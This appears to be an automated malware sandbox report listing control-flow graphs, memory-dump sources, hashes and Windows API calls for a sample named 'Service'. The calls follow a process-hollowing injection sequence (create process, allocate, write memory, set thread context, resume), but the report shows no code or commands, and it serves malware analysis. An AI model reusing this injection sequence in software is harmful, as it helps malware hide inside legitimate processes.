                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B35E49
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID: Q,
                      • API String ID: 963392458-4241536049
                      • Opcode ID: e7fc52f691efc95b9f0a545f07cbd90e0a8e72481daddaa8dc0c7764f263c1c1
                      • Instruction ID: 827dab7ddf47e468937217c3802c71d957380e3caaba00a6292e24d772e2b751
                      • Opcode Fuzzy Hash: e7fc52f691efc95b9f0a545f07cbd90e0a8e72481daddaa8dc0c7764f263c1c1
                      • Instruction Fuzzy Hash: B181C074C00269DFDB21CFA9C944BEDBBF5AB49300F1091EAE509B7261DB709A89CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 60 b36ea4-b36ea6 61 b36eaa 60->61 62 b36ea8 60->62 63 b36eae-b36f3b 61->63 64 b36eac-b36ead 61->64 62->61 65 b36f52-b36f60 63->65 66 b36f3d-b36f4f 63->66 64->63 67 b36f62-b36f74 65->67 68 b36f77-b36fb3 65->68 66->65 67->68 69 b36fc7-b37094 CreateProcessW 68->69 70 b36fb5-b36fc4 68->70 74 b37096-b3709c 69->74 75 b3709d-b3715c 69->75 70->69 74->75 85 b37192-b3719d 75->85 86 b3715e-b37187 75->86 90 b3719e 85->90 86->85 90->90
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00B37081
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID: Q,
                      • API String ID: 963392458-4241536049
                      • Opcode ID: 12da26835fe416e1b38ddd1d78e0e601673be3c34918c234a2aff6848ca26a3a
                      • Instruction ID: bf02198a1eba3a1085ee1a89e5dbe3f5dcf997b51b1ae978842c536e8abd7fba
                      • Opcode Fuzzy Hash: 12da26835fe416e1b38ddd1d78e0e601673be3c34918c234a2aff6848ca26a3a
                      • Instruction Fuzzy Hash: 4381B2B5C00269DFDB25CFA8D984BDDBBF5AB09300F1095AAE508B7260DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 b34e34-b34e3a 1 b34e3e-b34ecb 0->1 2 b34e3c 0->2 3 b34ee2-b34ef0 1->3 4 b34ecd-b34edf 1->4 2->1 5 b34ef2-b34f04 3->5 6 b34f07-b34f43 3->6 4->3 5->6 7 b34f57-b35024 CreateProcessW 6->7 8 b34f45-b34f54 6->8 12 b35026-b3502c 7->12 13 b3502d-b350ec 7->13 8->7 12->13 23 b35122-b3512d 13->23 24 b350ee-b35117 13->24 28 b3512e 23->28 24->23 28->28
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B35011
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID: Q,
                      • API String ID: 963392458-4241536049
                      • Opcode ID: 94268bd3799d5369de37d033793021dc1feafc02e8b0d9bcd8581616097a4636
                      • Instruction ID: 763bae8eb16c148d6a9cd12d40a76bfe7a65207c0e68c117f341e78eed4e27d1
                      • Opcode Fuzzy Hash: 94268bd3799d5369de37d033793021dc1feafc02e8b0d9bcd8581616097a4636
                      • Instruction Fuzzy Hash: FE81BF74C00269CFDF25CFA9C940BEDBBF5AB49300F1491AAE508B7261DB709A89DF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 119 b34024-b36f3b 121 b36f52-b36f60 119->121 122 b36f3d-b36f4f 119->122 123 b36f62-b36f74 121->123 124 b36f77-b36fb3 121->124 122->121 123->124 125 b36fc7-b37094 CreateProcessW 124->125 126 b36fb5-b36fc4 124->126 130 b37096-b3709c 125->130 131 b3709d-b3715c 125->131 126->125 130->131 141 b37192-b3719d 131->141 142 b3715e-b37187 131->142 146 b3719e 141->146 142->141 146->146
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00B37081
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID: Q,
                      • API String ID: 963392458-4241536049
                      • Opcode ID: 5ce4988094042d26d52e5e3d09222a31b20ce7dc145d645f588caed24cc82613
                      • Instruction ID: 8cffcd28bd6ca6ab8a035d55e5d1eecf06d2f3d965323d543b781f7b63508206
                      • Opcode Fuzzy Hash: 5ce4988094042d26d52e5e3d09222a31b20ce7dc145d645f588caed24cc82613
                      • Instruction Fuzzy Hash: BF81C375C00259DFDB21CFA9D984BDDBBF5AB49300F1091EAE508B7250DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 147 b3614c-b37d73 149 b37d75-b37d87 147->149 150 b37d8a-b37d98 147->150 149->150 151 b37d9a-b37dac 150->151 152 b37daf-b37deb 150->152 151->152 153 b37dff-b37ecc CreateProcessW 152->153 154 b37ded-b37dfc 152->154 158 b37ed5-b37f94 153->158 159 b37ece-b37ed4 153->159 154->153 169 b37f96-b37fbf 158->169 170 b37fca-b37fd5 158->170 159->158 169->170 174 b37fd6 170->174 174->174
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00B37EB9
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID: Q,
                      • API String ID: 963392458-4241536049
                      • Opcode ID: ef7e465e445e865b8a6185dae84327c2eb07f01242f7556a465d08b6e1d2c74a
                      • Instruction ID: fc93063257ed26e4b44600672cebe88ccfe67495d35015180585434811ec50e1
                      • Opcode Fuzzy Hash: ef7e465e445e865b8a6185dae84327c2eb07f01242f7556a465d08b6e1d2c74a
                      • Instruction Fuzzy Hash: D781A1B4C04269DFDB21CFA9C984BEDBBF5AB49300F1091EAE508B7250DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 91 b31b9c-b31c33 93 b31c35-b31c47 91->93 94 b31c4a-b31c58 91->94 93->94 95 b31c5a-b31c6c 94->95 96 b31c6f-b31cab 94->96 95->96 97 b31cbf-b31d8c CreateProcessW 96->97 98 b31cad-b31cbc 96->98 102 b31d95-b31e54 97->102 103 b31d8e-b31d94 97->103 98->97 113 b31e56-b31e7f 102->113 114 b31e8a-b31e95 102->114 103->102 113->114 118 b31e96 114->118 118->118
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B31D79
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID: Q,
                      • API String ID: 963392458-4241536049
                      • Opcode ID: 19af7c1757910cf3c87f231394d5ea7105f4df3d86914cd1ff78e2a2df81d8bd
                      • Instruction ID: f64cdbfcb57a5da2c3151ed1a54e9fd9a5d68b3b1e125936aca9f1da2a843d38
                      • Opcode Fuzzy Hash: 19af7c1757910cf3c87f231394d5ea7105f4df3d86914cd1ff78e2a2df81d8bd
                      • Instruction Fuzzy Hash: 0F81C174C00269DFDB21CFA9C940BEDBBF5AB49300F1095AAE508B7261DB709A89DF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 175 b37cdc-b37d73 177 b37d75-b37d87 175->177 178 b37d8a-b37d98 175->178 177->178 179 b37d9a-b37dac 178->179 180 b37daf-b37deb 178->180 179->180 181 b37dff-b37ecc CreateProcessW 180->181 182 b37ded-b37dfc 180->182 186 b37ed5-b37f94 181->186 187 b37ece-b37ed4 181->187 182->181 197 b37f96-b37fbf 186->197 198 b37fca-b37fd5 186->198 187->186 197->198 202 b37fd6 198->202 202->202
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00B37EB9
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID: Q,
                      • API String ID: 963392458-4241536049
                      • Opcode ID: b167f8d54d2202940c4f129cf9e08ce662a56f6c20aeef04ba08922c1bb97a8c
                      • Instruction ID: c888cfd9196a8286a26e4217c6228e59a6cd4e9afb98e262983e75c30d003638
                      • Opcode Fuzzy Hash: b167f8d54d2202940c4f129cf9e08ce662a56f6c20aeef04ba08922c1bb97a8c
                      • Instruction Fuzzy Hash: E481B2B5C00269DFDB21CFA9C984BEDBBF5AB49300F1091EAE508B7250DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 203 b31ba8-b31c33 204 b31c35-b31c47 203->204 205 b31c4a-b31c58 203->205 204->205 206 b31c5a-b31c6c 205->206 207 b31c6f-b31cab 205->207 206->207 208 b31cbf-b31d8c CreateProcessW 207->208 209 b31cad-b31cbc 207->209 213 b31d95-b31e54 208->213 214 b31d8e-b31d94 208->214 209->208 224 b31e56-b31e7f 213->224 225 b31e8a-b31e95 213->225 214->213 224->225 229 b31e96 225->229 229->229
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B31D79
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID: Q,
                      • API String ID: 963392458-4241536049
                      • Opcode ID: 996da8fc4eb4f76040b8eb621ca1ba6d0664c520c129f5f3de7bf101974a11c1
                      • Instruction ID: c6fd610754bdd880e1b9202d8c113b60822d28f0fd196d67e3e2ce6471e24a5e
                      • Opcode Fuzzy Hash: 996da8fc4eb4f76040b8eb621ca1ba6d0664c520c129f5f3de7bf101974a11c1
                      • Instruction Fuzzy Hash: D081C174C00229DFDF21CFA9C940BDDBBF5AB49300F1095AAE508B7261DB709A89DF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 257 b35c78-b35d03 258 b35d05-b35d17 257->258 259 b35d1a-b35d28 257->259 258->259 260 b35d2a-b35d3c 259->260 261 b35d3f-b35d7b 259->261 260->261 262 b35d8f-b35e5c CreateProcessW 261->262 263 b35d7d-b35d8c 261->263 267 b35e65-b35f24 262->267 268 b35e5e-b35e64 262->268 263->262 278 b35f26-b35f4f 267->278 279 b35f5a-b35f65 267->279 268->267 278->279 283 b35f66 279->283 283->283
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B35E49
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID: Q,
                      • API String ID: 963392458-4241536049
                      • Opcode ID: e2be5fe3585ee1bb6b616af38dd586d3ab192d7645dd83702fe02f18d1d3a7e3
                      • Instruction ID: 1312e0e325317cba0c6fdb5ed90129726a4ed7ebd834c355cc963228f29ef7fe
                      • Opcode Fuzzy Hash: e2be5fe3585ee1bb6b616af38dd586d3ab192d7645dd83702fe02f18d1d3a7e3
                      • Instruction Fuzzy Hash: 0C81B074C00269DFDF21CFA9C944BEDBBF5AB49300F1091AAE508B7261DB709A89DF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 230 b34e40-b34ecb 231 b34ee2-b34ef0 230->231 232 b34ecd-b34edf 230->232 233 b34ef2-b34f04 231->233 234 b34f07-b34f43 231->234 232->231 233->234 235 b34f57-b35024 CreateProcessW 234->235 236 b34f45-b34f54 234->236 240 b35026-b3502c 235->240 241 b3502d-b350ec 235->241 236->235 240->241 251 b35122-b3512d 241->251 252 b350ee-b35117 241->252 256 b3512e 251->256 252->251 256->256
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B35011
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID: Q,
                      • API String ID: 963392458-4241536049
                      • Opcode ID: 7c8d4768b8f3e34cf7a2fe546fdee5d232b84be4aab78a06ae311120e5adcc3f
                      • Instruction ID: 3c5b9c753c54cccb9b78dbe6bab5ab4f5512c785aa889a42d738ebb807aa228e
                      • Opcode Fuzzy Hash: 7c8d4768b8f3e34cf7a2fe546fdee5d232b84be4aab78a06ae311120e5adcc3f
                      • Instruction Fuzzy Hash: 6681BF74C00269CFDF25CFA9C940BDDBBF5AB49300F1091AAE508B7261DB719A89DF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 284 b321f0-b3225f 285 b32261-b32273 284->285 286 b32276-b322d6 WriteProcessMemory 284->286 285->286 287 b322d8-b322de 286->287 288 b322df-b3231d 286->288 287->288
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B322C6
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID: Q,
                      • API String ID: 3559483778-4241536049
                      • Opcode ID: bb538bf89a2856baccfe053d7917ac47182b5c4f14b02d5acf060da6e6958ffe
                      • Instruction ID: 81072a29bac539e8ebbdabe954d6fe0cba1ea8b4669a4c2502879ad8009b4d0c
                      • Opcode Fuzzy Hash: bb538bf89a2856baccfe053d7917ac47182b5c4f14b02d5acf060da6e6958ffe
                      • Instruction Fuzzy Hash: 4B4177B9D042589FCF10CFA9D984ADEFBF1BB49310F24906AE818B7250D375AA45CF64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 291 b321f8-b3225f 292 b32261-b32273 291->292 293 b32276-b322d6 WriteProcessMemory 291->293 292->293 294 b322d8-b322de 293->294 295 b322df-b3231d 293->295 294->295
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B322C6
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID: Q,
                      • API String ID: 3559483778-4241536049
                      • Opcode ID: a763ff6705a5963944d4aaf1cd8154ddd6f0eaf139ba65c52194cc34f451a871
                      • Instruction ID: f3954360861df7c05fae9b1d07fdf2ae889bc6823c70a3bd801cd675a2f3c73d
                      • Opcode Fuzzy Hash: a763ff6705a5963944d4aaf1cd8154ddd6f0eaf139ba65c52194cc34f451a871
                      • Instruction Fuzzy Hash: 8F4166B9D042589FCB00CFA9D984ADEFBF1BB49310F24906AE818B7210D375AA45CF64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 298 b31fd0-b32095 ReadProcessMemory 299 b32097-b3209d 298->299 300 b3209e-b320dc 298->300 299->300
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B32085
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID: Q,
                      • API String ID: 1726664587-4241536049
                      • Opcode ID: ee2e2f0b1e18138b4adfcaaa624126534a23cf7dbe743f2d9237a04f6f3aee95
                      • Instruction ID: 1681625abeb1e4eb78ac73fc46a8f3fc178078623ebc4c9485923dc501e1456f
                      • Opcode Fuzzy Hash: ee2e2f0b1e18138b4adfcaaa624126534a23cf7dbe743f2d9237a04f6f3aee95
                      • Instruction Fuzzy Hash: CA4187B9D042589FCF10CFA9D984ADEFBB1BB19310F24A06AE818B7210C375A945CF64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 303 b31fd8-b32095 ReadProcessMemory 304 b32097-b3209d 303->304 305 b3209e-b320dc 303->305 304->305
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B32085
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID: Q,
                      • API String ID: 1726664587-4241536049
                      • Opcode ID: 6ddd5f6b8cd1fb1f8044efc3f3434e0e7c7292d8230838b9e2f62f3cb52bd11b
                      • Instruction ID: 316046403d1709eff71f5bd93c17cb93b60a243d28ce8745ff3383cef44a278b
                      • Opcode Fuzzy Hash: 6ddd5f6b8cd1fb1f8044efc3f3434e0e7c7292d8230838b9e2f62f3cb52bd11b
                      • Instruction Fuzzy Hash: 983176B9D042589FCF10CFAAD984ADEFBF1BB09310F20A06AE814B7210D375A945CF64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 308 b320e8-b321a5 VirtualAllocEx 309 b321a7-b321ad 308->309 310 b321ae-b321e4 308->310 309->310
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00B32195
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: Q,
                      • API String ID: 4275171209-4241536049
                      • Opcode ID: f2b4a7efd056fd28ae74b53350db3c09455ae80131fa8505fcc23b8840a0c9b5
                      • Instruction ID: 5f23129db0d8e0a1a397af25033f9a0f40294d1adff49880907674cf0db928d8
                      • Opcode Fuzzy Hash: f2b4a7efd056fd28ae74b53350db3c09455ae80131fa8505fcc23b8840a0c9b5
                      • Instruction Fuzzy Hash: ED3176B9D042589FCF10CFA9D984ADEFBB1BB49310F24A05AE814B7210D375A946CF64
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00B32195
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: Q,
                      • API String ID: 4275171209-4241536049
                      • Opcode ID: fdc176f975daa5b529699375bcddf0158438ae59f22865e7b0e8132fd1817648
                      • Instruction ID: bd749fe67f1a6772c4b439869773a2992903d5e9101811b550869c89efdd49a5
                      • Opcode Fuzzy Hash: fdc176f975daa5b529699375bcddf0158438ae59f22865e7b0e8132fd1817648
                      • Instruction Fuzzy Hash: 0E3152B9D042589FCF10CFA9D984A9EFBB5BB09310F20A06AE918B7310D375A945CF65
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00B31F72
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID: Q,
                      • API String ID: 983334009-4241536049
                      • Opcode ID: 7aa2da34863618b44928d7622a54dfa49df38376e845a2b1a719517502964d41
                      • Instruction ID: 9db09d5d435669af356dcc98c7da341945d5e35fe5949448716da306f5164dd9
                      • Opcode Fuzzy Hash: 7aa2da34863618b44928d7622a54dfa49df38376e845a2b1a719517502964d41
                      • Instruction Fuzzy Hash: 5A31CAB5D012589FCB10CFA9D884ADEFBF1BB49314F24806AE418B7250C378AA45CF64
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00B31F72
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID: Q,
                      • API String ID: 983334009-4241536049
                      • Opcode ID: 4909f9e7dd9ef0b49bdcb15f9f0f5408c41941069f5fab05ecc03cd8222f3df5
                      • Instruction ID: 0fe21fd5f5a453979bdbdd70b518ccad90022a45be2df271f116535e7304700d
                      • Opcode Fuzzy Hash: 4909f9e7dd9ef0b49bdcb15f9f0f5408c41941069f5fab05ecc03cd8222f3df5
                      • Instruction Fuzzy Hash: 5931A6B5D012589FCB10CFAAD984ADEFBF5BB49310F24906AE418B7210D378AA45CF64
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 00B323AE
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID: Q,
                      • API String ID: 947044025-4241536049
                      • Opcode ID: 788dc3f81f62f002cef076d59f6906704472c52f2266dccaa7bb9d4b7530f592
                      • Instruction ID: 50aa9f39118ec0b8c8fb6aca71b69641656b1d9ef4c38f779a9e2f6ac521af63
                      • Opcode Fuzzy Hash: 788dc3f81f62f002cef076d59f6906704472c52f2266dccaa7bb9d4b7530f592
                      • Instruction Fuzzy Hash: 1621AAB9D042599FCB10CFA9D884ADEFBF4BB49320F24905AE819B7310C375A945CFA4
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 00B323AE
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_b30000_Service.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID: Q,
                      • API String ID: 947044025-4241536049
                      • Opcode ID: 10dc6939a670584ee64598a5064a62bf2e670110ebcf18398e935a1466d3a7c5
                      • Instruction ID: b41d2b19c2c1ecd52983fcf29dd28f939506ee56fb7bbc0482952e96eadba00e
                      • Opcode Fuzzy Hash: 10dc6939a670584ee64598a5064a62bf2e670110ebcf18398e935a1466d3a7c5
                      • Instruction Fuzzy Hash: 1221A8B9D042199FCB10CFA9D484ADEFBF4BB09320F20905AE818B3310D375A945CFA8
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2337734771.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_97d000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 10660fe9e89f229fdb96287a2f3c0d30d2fe942d28ded54b93f1fca9b30bf0ab
                      • Instruction ID: f57b2ac667cd4b3158ee9145b614ada88c6c22a4955669db71ec812d1694cf0f
                      • Opcode Fuzzy Hash: 10660fe9e89f229fdb96287a2f3c0d30d2fe942d28ded54b93f1fca9b30bf0ab
                      • Instruction Fuzzy Hash: 0221F1B6505204EFDB05DF14D9C0B26BF75FF94328F20C569E90E0A256C33AD856CAA1
                      Memory Dump Source
                      • Source File: 0000000B.00000002.2337734771.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_97d000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                      • Instruction ID: 63a92bdf45f781dc41697076e036bea1cecfcdd40c06c861f7b8ccfb4109f108
                      • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                      • Instruction Fuzzy Hash: 5A11AF76504284CFCB15CF10D5C4B16BF71FB94324F24C6A9D8090B256C33AD856CBA1
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2c20000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b964b9bb77b44bccd736b53f66f56382a7df3ad366fb3cecfa050856f3f6e104
                      • Instruction ID: 7aed5f4471924c0f25050ba09c3156c5b0909b6e59a94ac2db427a2b20c5116c
                      • Opcode Fuzzy Hash: b964b9bb77b44bccd736b53f66f56382a7df3ad366fb3cecfa050856f3f6e104
                      • Instruction Fuzzy Hash: 66518F74A016528FCF0AEF75E86C6AE7FA6FB892803005A3CD046C7255EF749C19CB80
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2c20000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8715b14dded007c54f701b8d851b6409d8e9bf93dbebe565a0ead1288451b94c
                      • Instruction ID: 03ca9719dbc2ba0dc8b7d1ef4d5533fcfc34c1cac2a7b73fea3aadf26e3f7aa8
                      • Opcode Fuzzy Hash: 8715b14dded007c54f701b8d851b6409d8e9bf93dbebe565a0ead1288451b94c
                      • Instruction Fuzzy Hash: DF918134B012518FCB09EF75E8686AE7FB6FB89240B005A2DD106DB3A5EF749C15CB80
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2c20000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72b12011d40284a3eabd73be823d0700c1da945a4df0a8db505ecdea69c09c82
                      • Instruction ID: 271316acf4ce9bba3f373517e3959ec9b35ae25067075e2d1a350bdb72a940de
                      • Opcode Fuzzy Hash: 72b12011d40284a3eabd73be823d0700c1da945a4df0a8db505ecdea69c09c82
                      • Instruction Fuzzy Hash: 9F319071B01B518BDB15EB79C82816EBAE6BFC52503048E3DC157CB781EF749D088B81
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2c20000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5d1fede14e48a94f45dc498b1e1a56c1b47a7890f8bcafb62b7546dfbe34e87c
                      • Instruction ID: 224379ba20401ab624be0dfc8e6aac54a23b4d815ec47f15b60faec85e5111bb
                      • Opcode Fuzzy Hash: 5d1fede14e48a94f45dc498b1e1a56c1b47a7890f8bcafb62b7546dfbe34e87c
                      • Instruction Fuzzy Hash: 8D216071B012159FDB44EBF9881837FBAEBEFD8250B14842ED54AD7386DE748C0587A1
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2366480013.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2c20000_Service.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567704a674c464709cb060271926a702fc5dac5c6b998b1b785038458b10ede5
